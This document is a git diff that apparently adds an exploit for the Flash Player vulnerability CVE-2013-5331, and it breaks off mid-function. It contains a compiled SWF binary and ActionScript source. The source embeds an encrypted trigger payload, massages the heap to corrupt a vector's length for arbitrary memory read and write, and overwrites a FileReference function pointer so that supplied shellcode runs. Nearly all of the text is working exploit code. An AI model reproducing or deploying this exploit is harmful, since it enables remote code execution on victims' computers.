diff --git a/data/exploits/CVE-2013-5331/Exploit.swf b/data/exploits/CVE-2013-5331/Exploit.swf new file mode 100755 index 0000000000000000000000000000000000000000..5dbfe348fb7d6b4347ebc626fc23772953e4d097 GIT binary patch literal 5122 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 literal 0 HcmV?d00001 diff --git a/external/source/exploits/CVE-2013-5331/Exploit.as b/external/source/exploits/CVE-2013-5331/Exploit.as new file mode 100755 index 0000000000..801edd0184 --- /dev/null +++ b/external/source/exploits/CVE-2013-5331/Exploit.as 
@@ -0,0 +1,897 @@ +//Compile: mxmlc.exe Exploit.as -o Exploit.swf + +package +{ + import flash.display.Sprite; + import flash.utils.ByteArray; + import flash.net.LocalConnection; + import flash.utils.Endian; + import flash.net.FileReference; + import __AS3__.vec.Vector; + import flash.system.Capabilities; + import flash.display.Loader; + import flash.utils.setTimeout; + + import flash.display.LoaderInfo; + + public class Exploit extends Sprite + { + var number_massage_vectors:uint = 0x18000; + var len_massage_vector:uint = 0x36; + var maxElementsPerPage:uint = 0xe00012; + var massage_array:Array; + var tweaked_vector; + var tweaked_vector_address; + var done:Boolean = false; + var receiver:LocalConnection; + // Embedded trigger, ActionScript source available at the end of this file as code comment. + var trigger_swf:String = "78da75565f4c9357144ff6b2cca7252ed91e966d2e2c35e0a605bc681d9f11a94f4b85745b05b2f0325c78d3651ad0173666d8941998a2d9f857a0aed8de425b4a59a1a520855908f4cf6de1d2967e03d9a2885127713a37d8b9f7fba0b0cc872fdc9eef777ee79cdf39dfb9343c2b0bf75c43d48cb36a08de5f41f07bb3e4b682128c1a435abf62b93b3f49f0a027fc15ea27e3c52ebd0fb9fbc5230e7b14fdd84f4b5c1db775d88e0b6c5e8abcce91125a3d52ea34f2df5a931e7f6ed3278a5d567f89c743cfba3a964a1d467f3eb5b5a0c1fea1bc25122872b8936a6a1f3a62b58bc864a7a57d7a5ce8edc5451686bb9cd4b9fbfdc7f0e5a1a2ee86d162ec4ca281c171d4e81e2a32b54ce699fa2327781c327ff4823159ea74b420b3939e6a68c067dbaa68becd33f122d5fbf35a2f2fa1ceb691bc3e63f4888724b58039eb218f0a1dee299d83dc2b7342dc2e27fea09d4ce69bc8bd7c13d466230b877b6d90437b5c6b3246510f19d675d68fe6f5da132c87f25e3bf09b71890be2eac944e160ad5c8b63a2a046aea7d7398c1cce1b857800170f905f8b06ec43a7fa3c37b403c6d1222799542f7947746ee74d84ddf7caee1251ebecc3fa0962406204231ae9449498b3a10fc26c40954de35d159a1016e25575fa3562c8146718a67b1da39c857e892166b3fcc7ef3af74b56b1334ed744b012fa898261ab3e460cca2bea2e148caf6dd30c612114c1e06746c0a58ca530d91c1304cc0a16c2525e7ba98c11c32c6617b3e5d0ad7e59dc2fbac6ce077d6a3312a3808d5bd2593e6233cbc750b6a8
ee43416af6bf02be7497168904fb6904e68e983381ef8b45750f0a8a12f7ec7a3cc643d8b3099334fb19e6278659fe3f4c2d0ace5d47c104d7660f259da7d97b7191e5df0838c3011fcb57e4b9e7fad42e24ae6ee1c94d696ae69ade845e10625024898ca9572925fd0d399c2bb2c0b8d22edc673e1eae3dab2138c463bc7ddec7eced29fb18b7bf25d937eb34c8e3059a55efd0b843f9183410ef1864dd0dbb792cff6aa566060b237157fa28fbbdd1bb4ee89de15d5f93ea008d5bf75039d7e0d472868662616ca3be3a86dfe9535f871ed422da38688e9126c4e2fa78cdf674cd08e6feeee80b521fe23da7af32fe49f0abb675c7c8ab7ea845188bdc7c0edfb9ad7c707ed2a4ca84b330165065d108d444ee661c0ae11505e3fdc390c96b7bb89021d5e67d5e6dc0f19d90e0bc172b4699fd8141c17dff045f88f32ca07a5ffea6d013822b65db3e1ae9009ba9fce1b3e5375ca70e71bb3fc0f8be81f7b7f40962d81e9c9366e2ca14b39f17a6791c3dc46943c11593ac1f16462fd9d83cecdc9887fba93a57b9cfd71575c3ca6c3a8f19dfcb3cbf49ebe67385661a2b15e01bd9d0e56fa647b5426d84f71bb1784d639cf35bceffa079314d1dc2a729e359b1cadac3f9b17ce673743e5df25bd0cf810e945854ad5be3d42b980fd40b75e706a995eb31cdf5d00b11d003b8f6f998be49f85ef84c9d4bcdd4d3e56d0cbf1650e5d2788db0c2f793e14d9ec7eaea0ea9871ee8a143de1b96f5bd2148bd815e32ecc4ea0ebaeb1ae3cde1dccbedbbf9398ccb6baa273feab14f68cdffa476be62ae19701654d08a0fd2da89e23edb64316d8996e1b6d163de795cd2661d2ea0ec91ee844d7781a8c575f327a8c39fd7d8b2847ea85ad3e2ea645167c390ceabe73d423c9ff042dab8a60b6d27f20e851a673f69473484f70e13aca3640afd4554aad4aee8cc8e7f39a04f92ce9c6048de05c18533a5619c73959d09ef490edf8f33d652d0257316f634bccf0e80b689b061cfc7090c7bb8eb751a1e3ecaeebc6922ef04d0303e63a9bc2ae19487a759bc36fe5d49bba9bbe2f726952069db25506eb3f0fd31d7ccf613ef89f09b0ffb432cdf10cff9a5e971f80bf169eda3e32eeb2f3aaf537cadc1b40677ec8dc23b44bbef0ef42b46d2ced0182ef77a473e747937ddb183517667b347d29c24f2fb8c23796d1d7e761f9f6c6dc0851ee3dd932d70d75e70d2e32677e284c33ea1a69bb51866fbe1335e879cf3cfd304f209f6226ac7f0bfc745a411f1c6ac2542dd9f06d426a641b6bc0ff65e69cd8019b9b5b96fec9ce9eb87f99db140fdf03e3400b30d7d89bebd9fcd4cec29cee935c1fd4ddad7358459efce9c6dba25e12239592c5e94a47672bcf9fb4a4d5cdad9b1f5796896ef5ad8
e571f62dc4eb77d04b90ebbffc1db134"; + var key:uint = 3.627461843E9; + var shellcodeObj:Array; + + public function Exploit() { + var trigger_decrypted:uint = 0; + super(); + shellcodeObj = LoaderInfo(this.root.loaderInfo).parameters.sh.split(","); + var i:* = 0; + this.massage_array = new Array(); + + // Memory massage + i = 0; + while(i < this.number_massage_vectors) + { + this.massage_array[i] = new Vector.(1); + i++; + } + i = 0; + while(i < this.number_massage_vectors) + { + this.massage_array[i] = new Vector.(this.len_massage_vector); + this.massage_array[i][0] = 0x41414141; + i++; + } + var j:* = 0; + i = 0; + while(i < this.number_massage_vectors) + { + j = 0; + while(j < 32) + { + this.massage_array[i][j] = 0x41414141; + j++; + } + i++; + } + var k:uint = (4096 - 32) / (this.len_massage_vector * 4 + 8); + i = 65536 + 6; + while(i < this.number_massage_vectors) + { + this.massage_array[i] = new Vector.(this.len_massage_vector * 2); + this.massage_array[i][0] = 0x42424242; + i = i + k; + } + + // Decompress/Decrypt trigger + this.receiver = new LocalConnection(); + this.receiver.connect("toAS3"); + this.receiver.client = this; + var trigger_byte_array:ByteArray = this.createByteArray(this.trigger_swf); + trigger_byte_array.endian = Endian.LITTLE_ENDIAN; + trigger_byte_array.uncompress(); + trigger_byte_array.position = 0; + i = 0; + while(i < trigger_byte_array.length / 4) + { + trigger_decrypted = trigger_byte_array.readUnsignedInt() ^ this.key; + trigger_byte_array.position = trigger_byte_array.position - 4; + trigger_byte_array.writeUnsignedInt(trigger_decrypted); + i++; + } + trigger_byte_array.position = 0; + + // Trigger corruption + var trigger_loader:Loader = new Loader(); + trigger_loader.loadBytes(trigger_byte_array); + + // Handler to check for corruption + setTimeout(this.as2loaded,4000,[]); + } + + function createByteArray(hex_string:String) : ByteArray { + var byte:String = null; + var byte_array:ByteArray = new ByteArray(); + var 
hex_string_length:uint = hex_string.length; + var i:uint = 0; + while(i < hex_string_length) + { + byte = hex_string.charAt(i) + hex_string.charAt(i + 1); + byte_array.writeByte(parseInt(byte,16)); + i = i + 2; + } + return byte_array; + } + + // When param1.length > 0 it's called from the corruption trigger + // Else it's called because of the timeout trigger + public function as2loaded(param1:Array) : * { + var back_offset:* = undefined; // backward offset from the tweaked vector + var j:* = undefined; + var _loc15_:uint = 0; + var ninbets:Array = null; + var array_with_code:Array = null; + var address_code:uint = 0; + var _loc19_:uint = 0; + if(this.done == true) + { + return; + } + if(param1.length > 0) + { + this.done = true; + } + var corrupted_index:uint = 0; + var i:* = 0; + i = 0x10000 + 6; + + // Search corrupted vector + while(i < this.number_massage_vectors) + { + if(this.massage_array[i].length != 2 * this.len_massage_vector) + { + if(this.massage_array[i].length != this.len_massage_vector) + { + corrupted_index = i; + this.massage_array[i][0] = 0x41424344; + break; + } + } + i++; + } + + // throw Error if any vector has been corrupted + if(i == this.number_massage_vectors) + { + throw new Error("not found"); + } + else // start the magic... 
+ { + // Tweak the length for the vector next to the corrupted one + this.massage_array[corrupted_index][this.len_massage_vector] = 0x40000001; + // Save the reference to the tweaked vector, it'll work with this one to leak and corrupt arbitrary memory + this.tweaked_vector = this.massage_array[corrupted_index + 1]; + var offset_length = 0; + // Ensure tweaked vector length corruption, I guess the offset to the vector length + // changes between flash versions + if(this.tweaked_vector.length != 0x40000001) + { + this.massage_array[corrupted_index][this.len_massage_vector + 10] = 0x40000001; + offset_length = 10; + } + if(param1.length > 0) // From the corruption trigger + { + // Fix the massage array of vectors, restores the corrupted vector and + // marks it as the last one. + back_offset = (4 * (this.len_massage_vector + 2) - 100) / 4 + this.len_massage_vector + 2; // 87 + j = 0; + /* + tweaked_vector->prior->prior, some data is overwritten, is used for search purposes + tweaked_vector[3fffffa7] = 0 + tweaked_vector[3fffffa8] = 0 + tweaked_vector[3fffffa9] = 1c0340 + tweaked_vector[3fffffaa] = ffffffff + tweaked_vector[3fffffab] = 0 + tweaked_vector[3fffffac] = 0 + tweaked_vector[3fffffad] = 0 + tweaked_vector[3fffffae] = 0 + tweaked_vector[3fffffaf] = 0 + tweaked_vector[3fffffb0] = 0 + tweaked_vector[3fffffb1] = 0 + tweaked_vector[3fffffb2] = 100 + tweaked_vector[3fffffb3] = 0 + tweaked_vector[3fffffb4] = 0 + tweaked_vector[3fffffb5] = 0 + tweaked_vector[3fffffb6] = 0 + tweaked_vector[3fffffb7] = 100dddce + tweaked_vector[3fffffb8] = 0 + tweaked_vector[3fffffb9] = 1df6000 + tweaked_vector[3fffffba] = 1dc2380 + tweaked_vector[3fffffbb] = 0 + tweaked_vector[3fffffbc] = 10000 + tweaked_vector[3fffffbd] = 70 + tweaked_vector[3fffffbe] = 0 + tweaked_vector[3fffffbf] = 4 + tweaked_vector[3fffffc0] = 0 + tweaked_vector[3fffffc1] = 1de7090 + tweaked_vector[3fffffc2] = 4 + tweaked_vector[3fffffc3] = 0 + tweaked_vector[3fffffc4] = 0 + tweaked_vector[3fffffc5] = 0 + // 
tweaked_vector->prior + tweaked_vector[3fffffc6] = 36 // Length + tweaked_vector[3fffffc7] = 1dea000 + tweaked_vector[3fffffc8] = 41414141 + tweaked_vector[3fffffc9] = 41414141 + tweaked_vector[3fffffca] = 41414141 + tweaked_vector[3fffffcb] = 41414141 + tweaked_vector[3fffffcc] = 41414141 + tweaked_vector[3fffffcd] = 41414141 + tweaked_vector[3fffffce] = 41414141 + tweaked_vector[3fffffcf] = 41414141 + tweaked_vector[3fffffd0] = 41414141 + tweaked_vector[3fffffd1] = 41414141 + tweaked_vector[3fffffd2] = 41414141 + tweaked_vector[3fffffd3] = 41414141 + tweaked_vector[3fffffd4] = 41414141 + tweaked_vector[3fffffd5] = 41414141 + tweaked_vector[3fffffd6] = 41414141 + tweaked_vector[3fffffd7] = 41414141 + tweaked_vector[3fffffd8] = 41414141 + tweaked_vector[3fffffd9] = 41414141 + tweaked_vector[3fffffda] = 41414141 + tweaked_vector[3fffffdb] = 41414141 + tweaked_vector[3fffffdc] = 41414141 + tweaked_vector[3fffffdd] = 41414141 + tweaked_vector[3fffffde] = 41414141 + tweaked_vector[3fffffdf] = 41414141 + tweaked_vector[3fffffe0] = 41414141 + tweaked_vector[3fffffe1] = 41414141 + tweaked_vector[3fffffe2] = 41414141 + tweaked_vector[3fffffe3] = 41414141 + tweaked_vector[3fffffe4] = 41414141 + tweaked_vector[3fffffe5] = 41414141 + tweaked_vector[3fffffe6] = 41414141 + tweaked_vector[3fffffe7] = 41414141 + tweaked_vector[3fffffe8] = 0 + tweaked_vector[3fffffe9] = 0 + tweaked_vector[3fffffea] = 0 + tweaked_vector[3fffffeb] = 0 + tweaked_vector[3fffffec] = 0 + tweaked_vector[3fffffed] = 0 + tweaked_vector[3fffffee] = 0 + tweaked_vector[3fffffef] = 0 + tweaked_vector[3ffffff0] = 0 + tweaked_vector[3ffffff1] = 0 + tweaked_vector[3ffffff2] = 0 + tweaked_vector[3ffffff3] = 0 + tweaked_vector[3ffffff4] = 0 + tweaked_vector[3ffffff5] = 0 + tweaked_vector[3ffffff6] = 0 + tweaked_vector[3ffffff7] = 0 + tweaked_vector[3ffffff8] = 0 + tweaked_vector[3ffffff9] = 0 + tweaked_vector[3ffffffa] = 0 + tweaked_vector[3ffffffb] = 0 + tweaked_vector[3ffffffc] = 0 + tweaked_vector[3ffffffd] = 0 
+ */ + while(j < back_offset) + { + this.tweaked_vector[0x40000000 - back_offset - 2 + j - offset_length] = param1[j]; + j++; + } + // tweaked_vector[3fffffff] = 1dea000 // Restores tweaked vector metadata + this.tweaked_vector[0x40000000-1] = param1[back_offset + 1]; + + + j = back_offset + 2; + + // Modifies the tweaked vector content, and overflow the next ones, they just remain in good state: + /* + // tweaked vector content + tweaked_vector[0] = 41414141 + tweaked_vector[1] = 41414141 + tweaked_vector[2] = 41414141 + tweaked_vector[3] = 41414141 + tweaked_vector[4] = 41414141 + tweaked_vector[5] = 41414141 + tweaked_vector[6] = 41414141 + tweaked_vector[7] = 41414141 + tweaked_vector[8] = 41414141 + tweaked_vector[9] = 41414141 + tweaked_vector[a] = 41414141 + tweaked_vector[b] = 41414141 + tweaked_vector[c] = 41414141 + tweaked_vector[d] = 41414141 + tweaked_vector[e] = 41414141 + tweaked_vector[f] = 41414141 + tweaked_vector[10] = 41414141 + tweaked_vector[11] = 41414141 + tweaked_vector[12] = 41414141 + tweaked_vector[13] = 41414141 + tweaked_vector[14] = 41414141 + tweaked_vector[15] = 41414141 + tweaked_vector[16] = 41414141 + tweaked_vector[17] = 41414141 + tweaked_vector[18] = 41414141 + tweaked_vector[19] = 41414141 + tweaked_vector[1a] = 41414141 + tweaked_vector[1b] = 41414141 + tweaked_vector[1c] = 41414141 + tweaked_vector[1d] = 41414141 + tweaked_vector[1e] = 41414141 + tweaked_vector[1f] = 41414141 + tweaked_vector[20] = 0 + tweaked_vector[21] = 0 + tweaked_vector[22] = 0 + tweaked_vector[23] = 0 + tweaked_vector[24] = 0 + tweaked_vector[25] = 0 + tweaked_vector[26] = 0 + tweaked_vector[27] = 0 + tweaked_vector[28] = 0 + tweaked_vector[29] = 0 + tweaked_vector[2a] = 0 + tweaked_vector[2b] = 0 + tweaked_vector[2c] = 0 + tweaked_vector[2d] = 0 + tweaked_vector[2e] = 0 + tweaked_vector[2f] = 0 + tweaked_vector[30] = 0 + tweaked_vector[31] = 0 + tweaked_vector[32] = 0 + tweaked_vector[33] = 0 + tweaked_vector[34] = 0 + tweaked_vector[35] = 0 + // 
next to the tweaked vector + tweaked_vector[36] = 36 + tweaked_vector[37] = 1dea000 + tweaked_vector[38] = 41414141 + tweaked_vector[39] = 41414141 + tweaked_vector[3a] = 41414141 + tweaked_vector[3b] = 41414141 + tweaked_vector[3c] = 41414141 + tweaked_vector[3d] = 41414141 + tweaked_vector[3e] = 41414141 + tweaked_vector[3f] = 41414141 + tweaked_vector[40] = 41414141 + tweaked_vector[41] = 41414141 + tweaked_vector[42] = 41414141 + tweaked_vector[43] = 41414141 + tweaked_vector[44] = 41414141 + tweaked_vector[45] = 41414141 + tweaked_vector[46] = 41414141 + tweaked_vector[47] = 41414141 + tweaked_vector[48] = 41414141 + tweaked_vector[49] = 41414141 + tweaked_vector[4a] = 41414141 + tweaked_vector[4b] = 41414141 + tweaked_vector[4c] = 41414141 + tweaked_vector[4d] = 41414141 + tweaked_vector[4e] = 41414141 + tweaked_vector[4f] = 41414141 + tweaked_vector[50] = 41414141 + tweaked_vector[51] = 41414141 + tweaked_vector[52] = 41414141 + tweaked_vector[53] = 41414141 + tweaked_vector[54] = 41414141 + tweaked_vector[55] = 41414141 + tweaked_vector[56] = 41414141 + tweaked_vector[57] = 41414141 + tweaked_vector[58] = 0 + tweaked_vector[59] = 0 + tweaked_vector[5a] = 0 + tweaked_vector[5b] = 0 + tweaked_vector[5c] = 0 + tweaked_vector[5d] = 0 + tweaked_vector[5e] = 0 + tweaked_vector[5f] = 0 + tweaked_vector[60] = 0 + tweaked_vector[61] = 0 + tweaked_vector[62] = 0 + tweaked_vector[63] = 0 + tweaked_vector[64] = 0 + tweaked_vector[65] = 0 + tweaked_vector[66] = 0 + tweaked_vector[67] = 0 + tweaked_vector[68] = 0 + tweaked_vector[69] = 0 + tweaked_vector[6a] = 0 + tweaked_vector[6b] = 0 + tweaked_vector[6c] = 0 + tweaked_vector[6d] = 0 + // next -> next to the tweaked vector + tweaked_vector[6e] = 36 + tweaked_vector[6f] = 1dea000 + tweaked_vector[70] = 41414141 + tweaked_vector[71] = 41414141 + tweaked_vector[72] = 41414141 + tweaked_vector[73] = 41414141 + tweaked_vector[74] = 41414141 + tweaked_vector[75] = 41414141 + tweaked_vector[76] = 41414141 + tweaked_vector[77] 
= 41414141 + tweaked_vector[78] = 41414141 + tweaked_vector[79] = 41414141 + tweaked_vector[7a] = 41414141 + tweaked_vector[7b] = 41414141 + tweaked_vector[7c] = 41414141 + tweaked_vector[7d] = 41414141 + tweaked_vector[7e] = 41414141 + tweaked_vector[7f] = 41414141 + tweaked_vector[80] = 41414141 + tweaked_vector[81] = 41414141 + tweaked_vector[82] = 41414141 + tweaked_vector[83] = 41414141 + tweaked_vector[84] = 41414141 + tweaked_vector[85] = 41414141 + tweaked_vector[86] = 41414141 + tweaked_vector[87] = 41414141 + tweaked_vector[88] = 41414141 + tweaked_vector[89] = 41414141 + tweaked_vector[8a] = 41414141 + tweaked_vector[8b] = 41414141 + tweaked_vector[8c] = 41414141 + tweaked_vector[8d] = 41414141 + tweaked_vector[8e] = 41414141 + tweaked_vector[8f] = 41414141 + tweaked_vector[90] = 0 + tweaked_vector[91] = 0 + tweaked_vector[92] = 0 + tweaked_vector[93] = 0 + tweaked_vector[94] = 0 + tweaked_vector[95] = 0 + tweaked_vector[96] = 0 + tweaked_vector[97] = 0 + tweaked_vector[98] = 0 + tweaked_vector[99] = 0 + tweaked_vector[9a] = 0 + tweaked_vector[9b] = 0 + tweaked_vector[9c] = 0 + tweaked_vector[9d] = 0 + tweaked_vector[9e] = 0 + tweaked_vector[9f] = 0 + tweaked_vector[a0] = 0 + tweaked_vector[a1] = 0 + tweaked_vector[a2] = 0 + tweaked_vector[a3] = 0 + tweaked_vector[a4] = 0 + tweaked_vector[a5] = 0 + */ + while(j < param1.length) + { + this.tweaked_vector[j - (back_offset + 2) + offset_length] = param1[j]; + j++; + } + // next -> next to the tweaked vector + // tweaked_vector[a6] = 36 + // tweaked_vector[a7] = 1dea000 + this.tweaked_vector[2 * (this.len_massage_vector + 2) + this.len_massage_vector + offset_length] = param1[back_offset]; // [166] => 36 + this.tweaked_vector[2 * (this.len_massage_vector + 2) + this.len_massage_vector + 1 + offset_length] = param1[back_offset + 1]; //[167] => 1dea000 + } + else // From the Timeout trigger; never reached on my tests. 
+ { + _loc15_ = this.tweaked_vector[4 * (this.len_massage_vector + 2)-1]; + this.tweaked_vector[0x3fffffff] = _loc15_; + this.tweaked_vector[0x3fffffff - this.len_massage_vector - 2] = _loc15_; + this.tweaked_vector[0x3fffffff - this.len_massage_vector - 3] = this.len_massage_vector; + this.tweaked_vector[this.len_massage_vector + 1] = _loc15_; + this.tweaked_vector[2 * (this.len_massage_vector + 2)-1] = _loc15_; + this.tweaked_vector[3 * (this.len_massage_vector + 2)-1] = _loc15_; + this.tweaked_vector[this.len_massage_vector] = this.len_massage_vector; + this.tweaked_vector[2 * (this.len_massage_vector + 2) - 2] = this.len_massage_vector; + this.tweaked_vector[3 * (this.len_massage_vector + 2) - 2] = this.len_massage_vector; + } + + this.massage_array[corrupted_index].length = 256; // :? + + // Search backwards to find the massage array metadata + // It's used to disclose the tweaked vector address + i = 0; + var hint = 0; + while(true) + { + hint = this.tweaked_vector[0x40000000 - i]; + if(hint == this.maxElementsPerPage-1) // 0xe00012 - 1 + { + break; + } + i++; + } + + this.tweaked_vector_address = 0; + if(this.tweaked_vector[0x40000000 - i - 4] == 0) + { + throw new Error("error"); + } + else + { + this.tweaked_vector_address = this.tweaked_vector[0x40000000 - i - 4] + (4 * this.len_massage_vector + 8) + 8 + 4 * offset_length; + + // I have not been able to understand this tweak, + // Maybe not necessary at all... 
+ i = 0; + hint = 0; + while(true) + { + hint = this.tweaked_vector[0x40000000 - i]; + if(hint == 0x7e3f0004) + { + break; + } + i++; + } + + this.tweaked_vector[0x40000000 - i + 1] = 4.294967295E9; // -1 / 0xffffffff + // End of maybe not necessary tweak + + var file_ref_array = new Array(); + i = 0; + while(i < 64) + { + file_ref_array[i] = new FileReference(); + i++; + } + + var file_reference_address = this.getFileReferenceLocation(this.tweaked_vector, this.tweaked_vector_address); + var ptr_backup = this.getMemoryAt(this.tweaked_vector, this.tweaked_vector_address, file_reference_address + 32); + + // Get array related data, important to trigger the desired corruption to achieve command execution + ninbets = this.getNinbets(this.tweaked_vector,this.tweaked_vector_address); + array_with_code = this.createCodeVectors(0x45454545, 0x90909090); + address_code = this.getCodeAddress(this.tweaked_vector, this.tweaked_vector_address, 0x45454545); + this.fillCodeVectors(array_with_code, address_code); + this.tweaked_vector[7] = ninbets[0] + 0; + this.tweaked_vector[4] = ninbets[1]; + this.tweaked_vector[0] = 4096; + this.tweaked_vector[1] = address_code & 0xfffff000; + // Corruption + this.writeMemoryAt(this.tweaked_vector, this.tweaked_vector_address, file_reference_address + 32, this.tweaked_vector_address + 8); + // Get arbitrary execution + i = 0; + while(i < 64) + { + file_ref_array[i].cancel(); + i++; + } + this.tweaked_vector[7] = address_code; + i = 0; + while(i < 64) + { + file_ref_array[i].cancel(); + i++; + } + // Restore Function Pointer + this.writeMemoryAt(this.tweaked_vector, this.tweaked_vector_address, file_reference_address + 32, ptr_backup); + + return; + } + } + } + + // vector: tweaked vector with 0x40000001 length + // vector_address: address of tweaked vector + // address: address to read + function getMemoryAt(vector:Vector., vector_address:uint, address:uint) : uint { + if(address >= vector_address) + { + return vector[(address - vector_address) 
